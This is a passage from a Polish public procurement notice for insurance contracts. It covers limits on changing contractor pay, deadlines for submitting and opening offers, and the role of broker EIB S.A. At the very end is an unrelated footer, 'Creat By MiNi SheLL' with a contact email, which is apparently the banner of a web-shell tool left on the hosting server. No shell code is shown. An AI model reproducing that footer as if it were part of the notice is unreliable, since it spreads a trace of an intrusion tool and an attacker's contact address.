może zostać wprowadzona najwcześniej<br/>po upływie 12 miesięcy obowiązywania umowy. Zasady zmiany wynagrodzenia opisane zostały<br/>w postanowieniach umownych. W sytuacji, gdy jest bezspornym, że powyższe zmiany mają<br/>wpływ na koszty wykonania zamówienia przez wykonawcę, następuje zmiana postanowień<br/>umowy dotyczących wynagrodzenia wykonawcy w formie przewidzianej w pkt. V. Maksymalna<br/>wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania<br/>postanowień o zasadach wprowadzenia zmiany wynagrodzenia wynosi 5%.<br/>V. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną<br/>w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektroniczne składanie ofert przy użyciu platformy zakupowej: https://eib-pzp.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-29 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Umowy ubezpieczenia będące przedmiotem niniejszego postępowania zostaną zawarte i<br/>wykonywane przy udziale i za pośrednictwem brokera ubezpieczeniowego EIB S.A. z siedzibą w<br/>Toruniu, ul. Jęczmienna 21.

Creat By MiNi SheLL
Email: jattceo@gmail.com